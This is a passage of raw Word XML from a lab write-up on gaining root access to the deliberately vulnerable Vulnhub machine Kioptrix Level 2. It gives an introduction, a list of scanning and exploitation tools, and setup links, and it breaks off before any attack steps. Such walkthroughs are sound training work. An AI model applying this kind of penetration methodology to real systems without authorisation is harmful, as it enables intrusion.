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5AAD" w14:textId="3568BE67" w:rsidR="002A04D8" w:rsidRPr="00B2627E" w:rsidRDefault="00B2627E" w:rsidP="00B2627E">
      <w:pPr>
        <w:ind w:left="3600"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1BA786" w14:textId="10BB8CF7" w:rsidR="00AE38E3" w:rsidRPr="00B2627E" w:rsidRDefault="007463D4" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc149067737"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5B080BCB" w14:textId="4D46BE18" w:rsidR="00C74136" w:rsidRPr="00DF1D42" w:rsidRDefault="00561A40" w:rsidP="00512225">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42" w:rsidRPr="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM Image </w:t>
      </w:r>
      <w:r w:rsidR="00BF65A4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>i.e.,</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> available on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>Vulnhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve">It is an </w:t>
      </w:r>
      <w:r w:rsidR="004F0896">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve">intermediate </w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve">machine. </w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42" w:rsidRPr="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine is available</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42" w:rsidRPr="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to acquire root access via any means possible (except actually hacking the VM server). </w:t>
      </w:r>
      <w:r w:rsidR="00646308" w:rsidRPr="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>his machine is developed as</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D42" w:rsidRPr="00DF1D42">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to learn the basic tools and techniques in vulnerability assessment and exploitation. </w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to check what vulnerability is present on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8FB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB9150" w14:textId="28AF504E" w:rsidR="008E0CB7" w:rsidRPr="002A04D8" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Name-</w:t>
      </w:r>
      <w:r w:rsidR="00646308">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACF024" w14:textId="02874F76" w:rsidR="008E0CB7" w:rsidRPr="002A04D8" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OS Type- Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71023A" w14:textId="49612FFB" w:rsidR="008E0CB7" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5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A04D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Source: - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A0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CF3C1" w14:textId="08BF452E" w:rsidR="00C74136" w:rsidRPr="002A04D8" w:rsidRDefault="00B5257D" w:rsidP="00BF65A4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kioptri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</w:t>
      </w:r>
      <w:r w:rsidR="00BF65A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URL: - </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00BF65A4" w:rsidRPr="00762605">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BF65A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532D670" w14:textId="17BF056F" w:rsidR="00B066B9" w:rsidRPr="00B2627E" w:rsidRDefault="007463D4" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc149067738"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4C2F3110" w14:textId="73A1A2C9" w:rsidR="00C74136" w:rsidRPr="002A04D8" w:rsidRDefault="00561A40" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C74136" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C74136" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine that is </w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>developed</w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F5585" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F5585" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F5585" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">o practice penetration testing skills. </w:t>
      </w:r>
      <w:r w:rsidR="002F5585" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is a</w:t>
      </w:r>
      <w:r w:rsidR="00306194">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> beginner to intermediate </w:t>
      </w:r>
      <w:r w:rsidR="002F5585" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>level machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5207B" w14:textId="1633FE27" w:rsidR="002F5585" w:rsidRPr="002A04D8" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Objective to solve this machine is to attain privilege access or root access of the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04470AD8" w14:textId="7C66921F" w:rsidR="002F5585" w:rsidRPr="002A04D8" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will use Metasploit tool i.e., inside Kali Linux to attain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DAAA9" w14:textId="5AFEA6EC" w:rsidR="002F5585" w:rsidRPr="002A04D8" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will proceed by basic fundamental steps of Ethical Hacking, that </w:t>
      </w:r>
      <w:r w:rsidR="00306194" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD60730" w14:textId="650F37AF" w:rsidR="002F5585" w:rsidRPr="002A04D8" w:rsidRDefault="002F5585" w:rsidP="00263DC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– Information Gathering and Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64552E98" w14:textId="0E1FFE6D" w:rsidR="002F5585" w:rsidRPr="002A04D8" w:rsidRDefault="002F5585" w:rsidP="00263DC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01717203" w14:textId="7A9AA3D0" w:rsidR="00C74136" w:rsidRPr="002A04D8" w:rsidRDefault="00263DC5" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">– Gain and Maintaining Access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCB6D0" w14:textId="77777777" w:rsidR="00263DC5" w:rsidRPr="002A04D8" w:rsidRDefault="00263DC5" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312D9D25" w14:textId="34C6DF1A" w:rsidR="00B066B9" w:rsidRPr="00B2627E" w:rsidRDefault="007463D4" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc149067739"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00263DC5" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4524C12E" w14:textId="2DC09659" w:rsidR="00C74136" w:rsidRPr="002A04D8" w:rsidRDefault="008E0CB7" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00AF22C4" w:rsidRPr="002A04D8">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t>etdiscover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF2954" w14:textId="592C7C5E" w:rsidR="008E0CB7" w:rsidRPr="002A04D8" w:rsidRDefault="008E0CB7" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00AF22C4" w:rsidRPr="002A04D8">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t>map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D190868" w14:textId="3EEBE77B" w:rsidR="00BC6CF3" w:rsidRDefault="008E0CB7" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00336EB6">
        <w:t>Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035ED3F4" w14:textId="6A693429" w:rsidR="00336EB6" w:rsidRDefault="00336EB6" w:rsidP="00C74136">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ACEC948" w14:textId="2A280152" w:rsidR="00336EB6" w:rsidRDefault="00336EB6" w:rsidP="00C74136">
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B79C1E3" w14:textId="2BB49425" w:rsidR="00336EB6" w:rsidRDefault="00336EB6" w:rsidP="00C74136">
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3982E452" w14:textId="77777777" w:rsidR="00336EB6" w:rsidRPr="002A04D8" w:rsidRDefault="00336EB6" w:rsidP="00C74136"/>
    <w:p w14:paraId="2C031816" w14:textId="77777777" w:rsidR="00BC6CF3" w:rsidRPr="002A04D8" w:rsidRDefault="00BC6CF3" w:rsidP="002A04D8"/>
    <w:p w14:paraId="0B6A2654" w14:textId="77777777" w:rsidR="002A04D8" w:rsidRDefault="002A04D8" w:rsidP="002A04D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A06D58E" w14:textId="77777777" w:rsidR="004F0896" w:rsidRDefault="004F0896" w:rsidP="004F0896">
      <w:bookmarkStart w:id="3" w:name="_Toc149067740"/>
    </w:p>
    <w:p w14:paraId="50790A59" w14:textId="2DF779C2" w:rsidR="00BC6CF3" w:rsidRPr="00B2627E" w:rsidRDefault="00B066B9" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.0 </w:t>
      </w:r>
      <w:r w:rsidR="00BC6CF3" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Prerequisite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2B8A7676" w14:textId="406AFC85" w:rsidR="00BC6CF3" w:rsidRPr="002A04D8" w:rsidRDefault="00BC6CF3" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">This solution </w:t>
      </w:r>
      <w:r w:rsidR="008F20AD" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">can only be followed </w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="008F20AD" w:rsidRPr="002A04D8">
        <w:t>Windows OS.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F20AD" w:rsidRPr="002A04D8">
        <w:t>We need to install VMware Workstation on Windows OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EA409" w14:textId="27E8C67A" w:rsidR="008F20AD" w:rsidRPr="002A04D8" w:rsidRDefault="008F20AD" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Download VMWare Workstation from mentioned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A04D8">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002A04D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.vmware.com/in/products/workstation-pro/workstation-pro-evaluation.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432B123" w14:textId="74421EED" w:rsidR="008F20AD" w:rsidRPr="002A04D8" w:rsidRDefault="008F20AD" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Next, we need to install kali Linux on VMware, so one need to download Kali Linux setup on Windows Machine to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="kali-virtual-machines" w:history="1">
        <w:r w:rsidRPr="002A04D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.kali.org/get-kali/#kali-virtual-machines</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7B65E" w14:textId="77B8BF2A" w:rsidR="008F20AD" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058A97D6" wp14:editId="3E0C75E0">
            <wp:extent cx="5731510" cy="3204210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="93642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29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EFEC" w14:textId="3D7F007C" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Click on the VMware button to download Kali Linux setup for VMware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E24B009" w14:textId="77777777" w:rsidR="003209DB" w:rsidRDefault="00AC5DB0" w:rsidP="003209DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">After installing Kali Linux on VMware Workstation next we need to install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 machine, to d</w:t>
      </w:r>
      <w:r w:rsidR="00BC6CF3" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">ownload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="00BC6CF3" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> image from mentioned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC6CF3" w:rsidRPr="002A04D8">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC6CF3" w:rsidRPr="002A04D8">
